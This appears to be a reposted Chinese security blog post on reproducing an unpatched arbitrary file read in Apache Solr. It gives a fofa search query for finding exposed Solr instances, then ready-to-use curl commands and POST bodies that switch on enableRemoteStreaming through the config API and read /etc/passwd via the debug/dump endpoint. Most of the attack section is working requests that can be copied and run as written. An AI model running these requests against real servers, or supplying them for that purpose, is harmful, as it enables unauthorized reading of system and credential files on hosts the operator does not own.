Apache Solr
Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现。
漏洞情报
近日skay师傅在审计solr的时候发现了一个任意文件读取漏洞,由于官方拒绝修复该漏洞,所以漏洞影响范围为Apache Solr全版本。
漏洞复现
得到漏洞情报后,我们抓紧复现下。
首先fofa搜索 app="APACHE-Solr"
![图片[1]-Apache Solr 任意文件读取漏洞复现 – 作者:公众号黑客前沿-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210318/1616046376_6052e928bd474562159ac.jpg)
打开首页:
![图片[2]-Apache Solr 任意文件读取漏洞复现 – 作者:公众号黑客前沿-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210318/1616046402_6052e942145d8e6c33f73.jpg)
我们需要先获取cores配置信息
http://target.com/solr/admin/cores?indexInfo=false&wt=json
![图片[3]-Apache Solr 任意文件读取漏洞复现 – 作者:公众号黑客前沿-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210318/1616046411_6052e94bc4ea8e11dc5f7.jpg)
接下来向服务器构造请求:
URL:
http://target.com/solr/db/config //db替换为cores配置中的name参数
POST data:
{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
或者使用curl:
curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://target.com/solr/db/config -H 'Content-type:application/json'
![图片[4]-Apache Solr 任意文件读取漏洞复现 – 作者:公众号黑客前沿-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210318/1616046421_6052e955ca8f5392a453a.jpg)
最后构造请求读取文件:
URL:
http://target.com/solr/db/debug/dump?param=ContentStreams //db替换为cores配置中的name参数
POST data:
stream.url=file:///etc/passwd
或者使用curl:
curl "http://target.com/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"
![图片[5]-Apache Solr 任意文件读取漏洞复现 – 作者:公众号黑客前沿-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210318/1616046431_6052e95f6a9aec148591d.jpg)
参考链接:
https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ
https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg
来源:freebuf.com 2021-03-18 13:45:32 by: 公众号黑客前沿
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册